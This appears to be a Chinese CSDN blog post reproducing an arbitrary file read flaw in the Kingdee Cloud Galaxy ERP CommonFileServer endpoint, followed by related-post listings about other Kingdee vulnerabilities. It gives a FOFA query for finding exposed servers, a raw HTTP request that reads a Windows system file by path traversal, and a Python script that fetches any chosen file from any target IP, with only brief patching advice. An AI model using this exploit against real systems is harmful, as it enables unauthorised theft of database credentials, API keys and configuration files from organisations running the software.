金蝶云星空 CommonFileServer 任意文件读取漏洞复现

已于 2023-12-08 17:24:59 修改
阅读量810 收藏 3
点赞数 6
分类专栏: 漏洞复现 文章标签: 网络安全 漏洞复现 poc exp python
于 2023-11-14 16:38:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/134398238
版权

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞概述

金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞,攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。

二、影响版本

    6.x-8.x版本

三、漏洞复现

fofa语法:app="金蝶云星空-管理中心"

poc

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 劫持重放

漏洞利用简单,直接在/CommonFileServer/路径后面接任意的文件名

四、EXP

 源码如下:

使用方法:直接运行,IP地址格式为127.0.0.1:8000

import requests
import urllib.parse

def poc(ip, file_path):
    # 对文件路径进行URL编码
    url_encoded_path = urllib.parse.quote(file_path)
    # 构造URL地址
    url = f'http://{ip}/CommonFileServer/{url_encoded_path}'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'keep-alive'
    }
    try:
        response = requests.get(url=url, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and '[fonts]' in response.text:
            print(f'[+] {ip} 存在任意文件读取漏洞')

    except Exception as e:
        print(f'[-] {ip} 请求失败:{e}')
        pass

if __name__ == '__main__':
    ip = input('请输入目标主机IP地址:')
    file_path = input('请输入需要访问的文件路径:')
    poc(ip, file_path)

五、修复建议

减小互联网暴露面,设置ACL权限,安全设备

当然最重要的是打好补丁

故事讲予风听
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kingdee漏洞金蝶EAS存在命令执行漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 5529
金蝶EAS基于云计算技术,为大型集团企业提供一体化、智能化的业务解决方案。 一、kingdee漏洞分析 公开日期:2021-06-12 漏洞编号:CNVD-2021-34565 危害等级:高危 漏洞描述:金蝶EAS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
漏洞复现--金蝶云星空反序列化远程代码执行
qq_53003652的博客
01-08 916
金蝶云星空金蝶集团面向大中型企业的一个核心产品,聚焦多组织,多利润中心的企业。它以“开放、标准、社交”三大特性为数字经济时代的企业提供开放的ERP云平台。该产品存在反序列化漏洞,攻击者可通过此漏洞执行任意命令。
【成功复现金蝶云星空反序列化远程代码执行漏洞
最新发布
weixin_57514792的博客
05-21 1149
【成功复现金蝶云星空反序列化远程代码执行漏洞
金蝶云星空任意文件读取漏洞复现
08-01 1064
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。
金蝶云星空任意文件读取漏洞
holyxp的博客
08-03 874
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。
漏洞复现--金蝶云星空 CommonFileServer 任意文件读取
qq_53003652的博客
11-01 497
金蝶云星空金蝶集团面向大中型企业的一个核心产品,聚焦多组织,多利润中心的企业。它以“开放、标准、社交”三大特性为数字经济时代的企业提供开放的ERP云平台。该产品CommonFileServer存在任意文件读取漏洞
【SSV-99782】金蝶云星空私有云存在文件上传漏洞(2023年11月发布)
m0_73896875的博客
11-23 1190
金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。攻击者可在无需登录的情况下利用此漏洞上传任意文件
金蝶云星空企业版8.1发版说明
03-08
金蝶云星空企业版8.1是金蝶软件(中国)有限公司推出的一款全面升级的企业级财务管理软件,旨在为企业提供更加高效、智能的解决方案。这款版本的发布,标志着金蝶云星空在产品特性和功能上实现了进一步的提升和优化...
2022金蝶云星空插件开发学习文档.zip
10-11
金蝶云星空插件开发学习指南》 在数字化转型的大潮中,企业管理系统的重要性日益凸显,金蝶云星空作为一款先进的企业管理软件,为企业的信息化提供了强大的支持。本指南主要聚焦于金蝶云星空的二次开发,特别是...
金蝶云星空字典表 SQL 数据库表 开发工具
08-12
方便做SQL视图或开发使用,运行K3CloudDataDictionaryexe.
金蝶云星空初级实施认证部分单选题
07-07
"金蝶云星空初级实施认证部分单选题知识点" 角色管理 1. 在角色管理中,子管理员用户不可以操作组织机构的创建和角色的创建,对自己创建的角色进行功能授权,在自己的授权范围内对另外子管理员设置授权范围。 资产...
金蝶云星空真实项目实施文档.zip
09-02
真实项目实施手册中的部分文档; 所有文档均出自本人独立实施的真实项目; 文档项目中所涉及到的甲乙方公司均已经替换为虚拟公司; 所有文档均由本人独立编撰完成; 包含模块(总账、智能会计平台、报表、应收款管理、应...
墨菲的鬼魂重现--金蝶ERP 资安大漏洞
qq_15037427的博客
03-20 1397
《墨菲定律》(Murphy\'s Law):Anything that can go wrong will go wrong. :“凡事只要有可能出错,那就一定会出错。”剧名: 墨菲的鬼魂重现 副标题: 金蝶ERP 资安大漏洞 (非授权补丁自动下载安装)环境: K3 WISE v14.3案发地点: 山东某一知名制造业公司案发时间: 2018/01/12 01:01~04罪魁祸首: 1. PT115...
金蝶 Apusic 应用服务器任意文件上传漏洞
Keepb1ue的博客
12-20 1180
金蝶 Apusic 应用服务器存在一个任意文件上传漏洞,攻击者可以通过构造恶意请求上传恶意文件到服务器,导致服务器失陷。
kingdee漏洞金蝶云星空存在弱口令漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-19 1933
​ kingdee漏洞简介,金蝶云星是基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。金蝶云星空存在弱口令漏洞,攻击者利用该漏洞登录系统后台,获取敏感信息。 CNNVD编号:CNVD-2022-15854 危害等级: 中危 CVE编号:未知 漏洞类型:通用型漏洞 威胁类型:未知 厂商:未知 漏洞来源:国家信息安全漏洞共享平台
金蝶EAS pdfviewlocal任意文件读取漏洞
Keepb1ue的博客
01-08 2185
金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。金蝶 EAS Cloud pdfViewLocal.jsp存在任意文件读取漏洞漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件
漏洞复现】​金蝶云星空管理中心反序列化命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
07-23 3581
金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。该软件存在远程命令执行漏洞,外部攻击者可通过使用恶意攻击手段对目标系统进行权限获取,进而接管服务器控制权。
【1day】复现金蝶OA CommonFileServer任意文件读取漏洞
记录并分享学习安全的知识点..
08-02 993
金蝶OA存在敏感文件泄露漏洞,攻击者利用此漏洞可访问敏感信息。
金蝶协同办公平台任意文件下载漏洞(无需登录)
weixin_50464560的博客
08-30 3034
直接访问即可下载该文件了,保存的文件名为:file.txt。很明显的任意文件下载漏洞,随便在网上找一个实例进行证明。经测试发现,该系统存在任意文件下载,且无需登录。
金蝶云星空初级实施认证考试(含答案)
05-16
"该资源是一份关于金蝶云星空初级实施认证考试的复习资料,包含了考试的答案,由用户积累整理而成。主要涉及金蝶云星空的系统管理、财务会计、固定资产管理、工作流程、报表设计等多个方面的知识。" 1. 角色管理:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值